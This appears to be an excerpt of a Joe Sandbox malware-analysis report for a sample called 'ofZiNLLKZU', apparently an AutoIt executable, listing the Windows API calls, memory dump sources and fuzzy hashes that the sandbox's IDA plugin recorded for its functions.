                                                                                • Opcode Fuzzy Hash: c045e1283cdf79bc20f5b00602b54c727243351bc9bc88674fb179c4ad24f248
                                                                                • Instruction Fuzzy Hash: 5201A275E00B18BBEB109BA59C49E5EBFB9EF48361F045066FA05E7380D6B09D00CFA0
                                                                                APIs
                                                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 005D1BF4
                                                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 005D1BFC
                                                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 005D1C07
                                                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 005D1C12
                                                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 005D1C1A
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 005D1C22
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual
                                                                                • String ID:
                                                                                • API String ID: 4278518827-0
                                                                                • Opcode ID: d188df23f8f2e2e872af121034a701e529bc129031237d79674b9023a4fc0855
                                                                                • Instruction ID: 2093f156cbcdc0ce0d441b1af84640ddbbb0b8e4f79e6d327769b8c9887c8454
                                                                                • Opcode Fuzzy Hash: d188df23f8f2e2e872af121034a701e529bc129031237d79674b9023a4fc0855
                                                                                • Instruction Fuzzy Hash: EA0148B0902B5A7DE3008F5A8C85A52FEA8FF19354F00411B915C47941C7F5A864CBE5
                                                                                APIs
                                                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0063EB30
                                                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0063EB46
                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 0063EB55
                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0063EB64
                                                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0063EB6E
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0063EB75
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                • String ID:
                                                                                • API String ID: 839392675-0
                                                                                • Opcode ID: e7bcbe69185a566a3f73ca3275f6e2022f952a1d50c6319d53c1b83b078a41eb
                                                                                • Instruction ID: 987a3475941e45ba2ef043b20b84c67c68b0fda048ed26801c83befc66f0ffa4
                                                                                • Opcode Fuzzy Hash: e7bcbe69185a566a3f73ca3275f6e2022f952a1d50c6319d53c1b83b078a41eb
                                                                                • Instruction Fuzzy Hash: C2F01772240958BBE7216B63DC0EEFB7A7DEFCAB21F001158F642E119196E05A0186B9
                                                                                APIs
                                                                                • GetClientRect.USER32(?), ref: 00627452
                                                                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 00627469
                                                                                • GetWindowDC.USER32(?), ref: 00627475
                                                                                • GetPixel.GDI32(00000000,?,?), ref: 00627484
                                                                                • ReleaseDC.USER32(?,00000000), ref: 00627496
                                                                                • GetSysColor.USER32(00000005), ref: 006274B0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                • String ID:
                                                                                • API String ID: 272304278-0
                                                                                • Opcode ID: 69031397ce57590d8598274237325a5018da82fe8151833d27034c64d796ad41
                                                                                • Instruction ID: 590ef8989ec7e4510aa886c4d25fec957174f811d8bad66391f0e2eef47353d9
                                                                                • Opcode Fuzzy Hash: 69031397ce57590d8598274237325a5018da82fe8151833d27034c64d796ad41
                                                                                • Instruction Fuzzy Hash: 7C018B31400A15EFDB106FA4EC08BFE7BB7FB04321F106060F956A21A0CB712E51AF51
                                                                                APIs
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0063187F
                                                                                • UnloadUserProfile.USERENV(?,?), ref: 0063188B
                                                                                • CloseHandle.KERNEL32(?), ref: 00631894
                                                                                • CloseHandle.KERNEL32(?), ref: 0063189C
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 006318A5
                                                                                • HeapFree.KERNEL32(00000000), ref: 006318AC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                • String ID:
                                                                                • API String ID: 146765662-0
                                                                                • Opcode ID: 8a5e4134cfad87f21309990825cf4c9edbc1241611e20ea6a3c659b707a722a0
                                                                                • Instruction ID: f61825a08f09d88ecb7019be31fc881faeebdf931320e37efa38cd8c3fd4e12d
                                                                                • Opcode Fuzzy Hash: 8a5e4134cfad87f21309990825cf4c9edbc1241611e20ea6a3c659b707a722a0
                                                                                • Instruction Fuzzy Hash: 89E0C936004901BBDB016BA3ED0C915FF2AFB4A7327109221F26591170CBB26420DB60
                                                                                APIs
                                                                                • __Init_thread_footer.LIBCMT ref: 005DBEB3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Init_thread_footer
                                                                                • String ID: D%j$D%j$D%j$D%jD%j
                                                                                • API String ID: 1385522511-528900389
                                                                                • Opcode ID: 637d596d62a2451f4b5496fdac43cf5b23189fd5cb93438537ee70192ea54dfc
                                                                                • Instruction ID: 69a5d6cf529ae3bd485d22c71cf7926fc7b30085faf162ab29ff1b04e04fa43e
                                                                                • Opcode Fuzzy Hash: 637d596d62a2451f4b5496fdac43cf5b23189fd5cb93438537ee70192ea54dfc
                                                                                • Instruction Fuzzy Hash: 92911775A0020ACFDB28DF5DC0906A9BBF3FF59310B26456BD945AB351E731AD81CB90
                                                                                APIs
                                                                                  • Part of subcall function 005F0242: EnterCriticalSection.KERNEL32(006A070C,006A1884,?,?,005E198B,006A2518,?,?,?,005D12F9,00000000), ref: 005F024D
                                                                                  • Part of subcall function 005F0242: LeaveCriticalSection.KERNEL32(006A070C,?,005E198B,006A2518,?,?,?,005D12F9,00000000), ref: 005F028A
                                                                                  • Part of subcall function 005D9CB3: _wcslen.LIBCMT ref: 005D9CBD
                                                                                  • Part of subcall function 005F00A3: __onexit.LIBCMT ref: 005F00A9
                                                                                • __Init_thread_footer.LIBCMT ref: 00657BFB
                                                                                  • Part of subcall function 005F01F8: EnterCriticalSection.KERNEL32(006A070C,?,?,005E8747,006A2514), ref: 005F0202
                                                                                  • Part of subcall function 005F01F8: LeaveCriticalSection.KERNEL32(006A070C,?,005E8747,006A2514), ref: 005F0235
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                • String ID: +Tb$5$G$Variable must be of type 'Object'.
                                                                                • API String ID: 535116098-488681553
                                                                                • Opcode ID: b5ea295c07397857a7294f02df67256f87cbde0a1b3c5020a3023f0d3ccc71f3
                                                                                • Instruction ID: aa168381c03c60cb0d985ebdc6af8bba65b7f077f53f593f347e8de908b2812c
                                                                                • Opcode Fuzzy Hash: b5ea295c07397857a7294f02df67256f87cbde0a1b3c5020a3023f0d3ccc71f3
                                                                                • Instruction Fuzzy Hash: BA918C70A04209AFCB14EF58E8959BDBBB2FF45301F14815AFC469B392DB31AE49CB51
                                                                                APIs
                                                                                  • Part of subcall function 005D7620: _wcslen.LIBCMT ref: 005D7625
                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0063C6EE
                                                                                • _wcslen.LIBCMT ref: 0063C735
                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0063C79C
                                                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0063C7CA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ItemMenu$Info_wcslen$Default
                                                                                • String ID: 0
                                                                                • API String ID: 1227352736-4108050209
APIs
• ShellExecuteExW.SHELL32(0000003C), ref: 0065AEA3
  • Part of subcall function 005D7620: _wcslen.LIBCMT ref: 005D7625
• GetProcessId.KERNEL32(00000000), ref: 0065AF38
• CloseHandle.KERNEL32(00000000), ref: 0065AF67
Strings
Memory Dump Source
• Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
Similarity
• API ID: CloseExecuteHandleProcessShell_wcslen
• String ID: <$@
• API String ID: 146682121-1426351568
APIs
• CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00637206
• SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0063723C
• GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0063724D
• SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 006372CF
Strings
Memory Dump Source
• Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
Similarity
• API ID: ErrorMode$AddressCreateInstanceProc
• String ID: DllGetClassObject
• API String ID: 753597075-1075368562
APIs
• SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00662F8D
• LoadLibraryW.KERNEL32(?), ref: 00662F94
• SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00662FA9
• DestroyWindow.USER32(?), ref: 00662FB1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
Similarity
• API ID: MessageSend$DestroyLibraryLoadWindow
• String ID: SysAnimate32
• API String ID: 3529120543-1011021900
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,005F4D1E,006028E9,?,005F4CBE,006028E9,006988B8,0000000C,005F4E15,006028E9,00000002), ref: 005F4D8D
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 005F4DA0
• FreeLibrary.KERNEL32(00000000,?,?,?,005F4D1E,006028E9,?,005F4CBE,006028E9,006988B8,0000000C,005F4E15,006028E9,00000002,00000000), ref: 005F4DC3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,?,005D4EDD,?,006A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 005D4E9C
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 005D4EAE
• FreeLibrary.KERNEL32(00000000,?,?,005D4EDD,?,006A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 005D4EC0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: Wow64DisableWow64FsRedirection$kernel32.dll
• API String ID: 145871493-3689287502
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,?,00613CDE,?,006A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 005D4E62
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 005D4E74
• FreeLibrary.KERNEL32(00000000,?,?,00613CDE,?,006A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 005D4E87
Strings
Memory Dump Source
• Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: Wow64RevertWow64FsRedirection$kernel32.dll
• API String ID: 145871493-1355242751
APIs
• GetCurrentProcessId.KERNEL32 ref: 0065A427
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0065A435
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 0065A468
• CloseHandle.KERNEL32(?), ref: 0065A63D
Memory Dump Source
• Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
Similarity
• API ID: Process$CloseCountersCurrentHandleOpen
• String ID:
• API String ID: 3488606520-0
APIs
• GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00673700), ref: 0060BB91
• WideCharToMultiByte.KERNEL32(00000000,00000000,006A121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0060BC09
• WideCharToMultiByte.KERNEL32(00000000,00000000,006A1270,000000FF,?,0000003F,00000000,?), ref: 0060BC36
• _free.LIBCMT ref: 0060BB7F
  • Part of subcall function 006029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0060D7D1,00000000,00000000,00000000,00000000,?,0060D7F8,00000000,00000007,00000000,?,0060DBF5,00000000), ref: 006029DE
  • Part of subcall function 006029C8: GetLastError.KERNEL32(00000000,?,0060D7D1,00000000,00000000,00000000,00000000,?,0060D7F8,00000000,00000007,00000000,?,0060DBF5,00000000,00000000), ref: 006029F0
• _free.LIBCMT ref: 0060BD4B
Memory Dump Source
• Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
Similarity
• API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
• String ID:
• API String ID: 1286116820-0
APIs
  • Part of subcall function 0063DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0063CF22,?), ref: 0063DDFD
  • Part of subcall function 0063DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0063CF22,?), ref: 0063DE16
  • Part of subcall function 0063E199: GetFileAttributesW.KERNEL32(?,0063CF95), ref: 0063E19A
• lstrcmpiW.KERNEL32(?,?), ref: 0063E473
• MoveFileW.KERNEL32(?,?), ref: 0063E4AC
• _wcslen.LIBCMT ref: 0063E5EB
• _wcslen.LIBCMT ref: 0063E603
• SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0063E650
Memory Dump Source
• Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
Similarity
• API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
• String ID:
• API String ID: 3183298772-0
                                                                                • Opcode ID: 2278173a58fbff88c00a8fcee2c47c53c658ff236056a73059d56cf458ca0739
                                                                                • Instruction ID: a55a551998a605c81b68eb8d4718b6d84337c9d9473687f2af9d45927a6fb93e
                                                                                • Opcode Fuzzy Hash: 2278173a58fbff88c00a8fcee2c47c53c658ff236056a73059d56cf458ca0739
                                                                                • Instruction Fuzzy Hash: BE51C5B24083455BC724DB90DC859EF77DDAF84300F00091EF689D3192EF75A58887AA
                                                                                APIs
                                                                                  • Part of subcall function 005D9CB3: _wcslen.LIBCMT ref: 005D9CBD
                                                                                  • Part of subcall function 0065C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0065B6AE,?,?), ref: 0065C9B5
                                                                                  • Part of subcall function 0065C998: _wcslen.LIBCMT ref: 0065C9F1
                                                                                  • Part of subcall function 0065C998: _wcslen.LIBCMT ref: 0065CA68
                                                                                  • Part of subcall function 0065C998: _wcslen.LIBCMT ref: 0065CA9E
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0065BAA5
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0065BB00
                                                                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0065BB63
                                                                                • RegCloseKey.ADVAPI32(?,?), ref: 0065BBA6
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0065BBB3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                • String ID:
                                                                                • API String ID: 826366716-0
                                                                                • Opcode ID: d07cb4822262e53d463e37fbfd10c108e1876d555a3c81376dbf74aea4781f52
                                                                                • Instruction ID: da35d82b0460b75acbb10950e8d5ba51d7928900fb75fbac6365f22338bf70d0
                                                                                • Opcode Fuzzy Hash: d07cb4822262e53d463e37fbfd10c108e1876d555a3c81376dbf74aea4781f52
                                                                                • Instruction Fuzzy Hash: 8D61B031208242AFD314DF14C494E6ABBE6FF84318F14955DF8998B3A2DB71ED49CB92
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(?), ref: 00638BCD
                                                                                • VariantClear.OLEAUT32 ref: 00638C3E
                                                                                • VariantClear.OLEAUT32 ref: 00638C9D
                                                                                • VariantClear.OLEAUT32(?), ref: 00638D10
                                                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00638D3B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$Clear$ChangeInitType
                                                                                • String ID:
                                                                                • API String ID: 4136290138-0
                                                                                • Opcode ID: d0bf2db6c4c18240826a6999e824fa6a6913201f551f2fa9c180fd51721f69fe
                                                                                • Instruction ID: dedfed6754a5979168a74064d0075ff2839d2efe078d474640897da3bb65d57e
                                                                                • Opcode Fuzzy Hash: d0bf2db6c4c18240826a6999e824fa6a6913201f551f2fa9c180fd51721f69fe
